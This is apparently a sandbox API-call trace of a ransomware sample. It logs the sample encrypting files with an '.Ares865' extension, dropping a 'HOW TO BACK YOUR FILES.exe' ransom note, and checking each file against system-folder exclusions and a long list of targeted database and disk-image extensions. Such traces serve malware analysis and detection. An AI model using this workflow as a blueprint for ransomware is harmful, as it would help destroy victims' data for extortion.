[0067.957] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\windows powershell modules.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.958] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2741) returned 1 [0067.958] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.958] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.959] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.959] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.959] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.959] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdc0, lpName=0x0) returned 0x118 [0067.961] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdc0) returned 0x190000 [0067.962] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.963] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.963] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.963] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.963] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.963] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.963] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.963] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.963] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.963] CloseHandle (hObject=0x118) returned 1 [0067.963] CloseHandle (hObject=0x12c) returned 1 [0067.964] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.964] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.964] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.964] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xab5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows PowerShell Modules.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0067.964] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0067.964] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0067.964] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories" [0067.964] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4c50 | out: hHeap=0x2b0000) returned 1 [0067.964] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0067.964] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories") returned 50 [0067.964] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories" [0067.964] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.964] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\how to back your files.exe"), bFailIfExists=1) returned 0 [0067.965] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.965] GetLastError () returned 0x20 [0067.965] Sleep (dwMilliseconds=0xc8) [0068.166] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.166] GetLastError () returned 0x0 [0068.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0068.166] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0068.167] CloseHandle (hObject=0x118) returned 1 [0068.167] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0068.167] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.167] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbcba20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0068.167] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0068.167] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0068.167] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.167] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbcba20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.167] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0068.167] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0068.167] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.167] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.167] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4bbf1b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbf1b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="aoldtz.exe") returned -1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2=".") returned 1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="..") returned 1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="windows") returned -1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="bootmgr") returned -1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="temp") returned -1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="pagefile.sys") returned -1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="boot") returned -1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="ids.txt") returned -1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="ntuser.dat") returned -1 [0068.167] lstrcmpiW (lpString1="Accessibility", lpString2="perflogs") returned -1 [0068.168] lstrcmpiW (lpString1="Accessibility", lpString2="MSBuild") returned -1 [0068.168] lstrlenW (lpString="Accessibility") returned 13 [0068.168] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\*") returned 52 [0068.168] lstrcpyW (in: lpString1=0x2cce466, lpString2="Accessibility" | out: lpString1="Accessibility") returned="Accessibility" [0068.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0068.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x82) returned 0x2e9eb0 [0068.168] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0068.168] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3e9c58, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x3e3e9c58, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x3e435f19, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Calculator.lnk", cAlternateFileName="CALCUL~1.LNK")) returned 1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="aoldtz.exe") returned 1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2=".") returned 1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="..") returned 1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="windows") returned -1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="bootmgr") returned 1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="temp") returned -1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="pagefile.sys") returned -1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="boot") returned 1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="ids.txt") returned -1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="ntuser.dat") returned -1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="perflogs") returned -1 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2="MSBuild") returned -1 [0068.168] lstrlenW (lpString="Calculator.lnk") returned 14 [0068.168] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Accessibility") returned 64 [0068.168] lstrcpyW (in: lpString1=0x2cce466, lpString2="Calculator.lnk" | out: lpString1="Calculator.lnk") returned="Calculator.lnk" [0068.168] lstrlenW (lpString="Calculator.lnk") returned 14 [0068.168] lstrlenW (lpString="Ares865") returned 7 [0068.168] lstrcmpiW (lpString1="tor.lnk", lpString2="Ares865") returned 1 [0068.168] lstrlenW (lpString=".dll") returned 4 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2=".dll") returned 1 [0068.168] lstrlenW (lpString=".lnk") returned 4 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2=".lnk") returned 1 [0068.168] lstrlenW (lpString=".ini") returned 4 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2=".ini") returned 1 [0068.168] lstrlenW (lpString=".sys") returned 4 [0068.168] lstrcmpiW (lpString1="Calculator.lnk", lpString2=".sys") returned 1 [0068.168] lstrlenW (lpString="Calculator.lnk") returned 14 [0068.168] lstrlenW (lpString="bak") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0068.169] lstrlenW (lpString="ba_") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0068.169] lstrlenW (lpString="dbb") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0068.169] lstrlenW (lpString="vmdk") returned 4 [0068.169] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0068.169] lstrlenW (lpString="rar") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0068.169] lstrlenW (lpString="zip") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0068.169] lstrlenW (lpString="tgz") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0068.169] lstrlenW (lpString="vbox") returned 4 [0068.169] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0068.169] lstrlenW (lpString="vdi") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0068.169] lstrlenW (lpString="vhd") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0068.169] lstrlenW (lpString="vhdx") returned 4 [0068.169] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0068.169] lstrlenW (lpString="avhd") returned 4 [0068.169] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0068.169] lstrlenW (lpString="db") returned 2 [0068.169] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0068.169] lstrlenW (lpString="db2") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0068.169] lstrlenW (lpString="db3") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0068.169] lstrlenW (lpString="dbf") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0068.169] lstrlenW (lpString="mdf") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0068.169] lstrlenW (lpString="mdb") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0068.169] lstrlenW (lpString="sql") returned 3 [0068.169] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0068.169] lstrlenW (lpString="sqlite") returned 6 [0068.170] lstrcmpiW (lpString1="or.lnk", lpString2="sqlite") returned -1 [0068.170] lstrlenW (lpString="sqlite3") returned 7 [0068.170] lstrcmpiW (lpString1="tor.lnk", lpString2="sqlite3") returned 1 [0068.170] lstrlenW (lpString="sqlitedb") returned 8 [0068.170] lstrcmpiW (lpString1="ator.lnk", lpString2="sqlitedb") returned -1 [0068.170] lstrlenW (lpString="xml") returned 3 [0068.170] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0068.170] lstrlenW (lpString="$er") returned 3 [0068.170] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0068.170] lstrlenW (lpString="4dd") returned 3 [0068.170] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0068.170] lstrlenW (lpString="4dl") returned 3 [0068.170] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0068.170] lstrlenW (lpString="^^^") returned 3 [0068.170] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0068.170] lstrlenW (lpString="abs") returned 3 [0068.170] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0068.170] lstrlenW (lpString="abx") returned 3 [0068.170] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0068.170] lstrlenW (lpString="accdb") returned 5 [0068.170] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0068.170] lstrlenW (lpString="accdc") returned 5 [0068.170] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0068.170] lstrlenW (lpString="accde") returned 5 [0068.170] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0068.170] lstrlenW (lpString="accdr") returned 5 [0068.170] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0068.170] lstrlenW (lpString="accdt") returned 5 [0068.170] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0068.170] lstrlenW (lpString="accdw") returned 5 [0068.170] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0068.170] lstrlenW (lpString="accft") returned 5 [0068.170] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0068.170] lstrlenW (lpString="adb") returned 3 [0068.170] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.170] lstrlenW (lpString="adb") returned 3 [0068.170] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.170] lstrlenW (lpString="ade") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0068.171] lstrlenW (lpString="adf") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0068.171] lstrlenW (lpString="adn") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0068.171] lstrlenW (lpString="adp") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0068.171] lstrlenW (lpString="alf") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0068.171] lstrlenW (lpString="ask") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0068.171] lstrlenW (lpString="btr") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0068.171] lstrlenW (lpString="cat") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0068.171] lstrlenW (lpString="cdb") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0068.171] lstrlenW (lpString="ckp") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0068.171] lstrlenW (lpString="cma") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0068.171] lstrlenW (lpString="cpd") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0068.171] lstrlenW (lpString="dacpac") returned 6 [0068.171] lstrcmpiW (lpString1="or.lnk", lpString2="dacpac") returned 1 [0068.171] lstrlenW (lpString="dad") returned 3 [0068.171] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0068.171] lstrlenW (lpString="dadiagrams") returned 10 [0068.171] lstrcmpiW (lpString1="ulator.lnk", lpString2="dadiagrams") returned 1 [0068.171] lstrlenW (lpString="daschema") returned 8 [0068.171] lstrcmpiW (lpString1="ator.lnk", lpString2="daschema") returned -1 [0068.171] lstrlenW (lpString="db-journal") returned 10 [0068.171] lstrcmpiW (lpString1="ulator.lnk", lpString2="db-journal") returned 1 [0068.171] lstrlenW (lpString="db-shm") returned 6 [0068.171] lstrcmpiW (lpString1="or.lnk", lpString2="db-shm") returned 1 [0068.172] lstrlenW (lpString="db-wal") returned 6 [0068.172] lstrcmpiW (lpString1="or.lnk", lpString2="db-wal") returned 1 [0068.172] lstrlenW (lpString="dbc") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0068.172] lstrlenW (lpString="dbs") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0068.172] lstrlenW (lpString="dbt") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0068.172] lstrlenW (lpString="dbv") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0068.172] lstrlenW (lpString="dbx") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0068.172] lstrlenW (lpString="dcb") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0068.172] lstrlenW (lpString="dct") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0068.172] lstrlenW (lpString="dcx") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0068.172] lstrlenW (lpString="ddl") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0068.172] lstrlenW (lpString="dlis") returned 4 [0068.172] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0068.172] lstrlenW (lpString="dp1") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0068.172] lstrlenW (lpString="dqy") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0068.172] lstrlenW (lpString="dsk") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0068.172] lstrlenW (lpString="dsn") returned 3 [0068.172] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0068.172] lstrlenW (lpString="dtsx") returned 4 [0068.173] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0068.173] lstrlenW (lpString="dxl") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0068.173] lstrlenW (lpString="eco") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0068.173] lstrlenW (lpString="ecx") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0068.173] lstrlenW (lpString="edb") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0068.173] lstrlenW (lpString="epim") returned 4 [0068.173] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0068.173] lstrlenW (lpString="fcd") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0068.173] lstrlenW (lpString="fdb") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0068.173] lstrlenW (lpString="fic") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0068.173] lstrlenW (lpString="flexolibrary") returned 12 [0068.173] lstrcmpiW (lpString1="lculator.lnk", lpString2="flexolibrary") returned 1 [0068.173] lstrlenW (lpString="fm5") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0068.173] lstrlenW (lpString="fmp") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0068.173] lstrlenW (lpString="fmp12") returned 5 [0068.173] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0068.173] lstrlenW (lpString="fmpsl") returned 5 [0068.173] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0068.173] lstrlenW (lpString="fol") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0068.173] lstrlenW (lpString="fp3") returned 3 [0068.173] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0068.173] lstrlenW (lpString="fp4") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0068.174] lstrlenW (lpString="fp5") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0068.174] lstrlenW (lpString="fp7") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0068.174] lstrlenW (lpString="fpt") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0068.174] lstrlenW (lpString="frm") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0068.174] lstrlenW (lpString="gdb") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0068.174] lstrlenW (lpString="gdb") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0068.174] lstrlenW (lpString="grdb") returned 4 [0068.174] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0068.174] lstrlenW (lpString="gwi") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0068.174] lstrlenW (lpString="hdb") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0068.174] lstrlenW (lpString="his") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0068.174] lstrlenW (lpString="ib") returned 2 [0068.174] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0068.174] lstrlenW (lpString="idb") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0068.174] lstrlenW (lpString="ihx") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0068.174] lstrlenW (lpString="itdb") returned 4 [0068.174] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0068.174] lstrlenW (lpString="itw") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0068.174] lstrlenW (lpString="jet") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0068.174] lstrlenW (lpString="jtx") returned 3 [0068.174] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0068.175] lstrlenW (lpString="kdb") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0068.175] lstrlenW (lpString="kexi") returned 4 [0068.175] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0068.175] lstrlenW (lpString="kexic") returned 5 [0068.175] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0068.175] lstrlenW (lpString="kexis") returned 5 [0068.175] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0068.175] lstrlenW (lpString="lgc") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0068.175] lstrlenW (lpString="lwx") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0068.175] lstrlenW (lpString="maf") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0068.175] lstrlenW (lpString="maq") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0068.175] lstrlenW (lpString="mar") returned 3 [0068.175] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0068.175] lstrlenW (lpString="marshal") returned 7 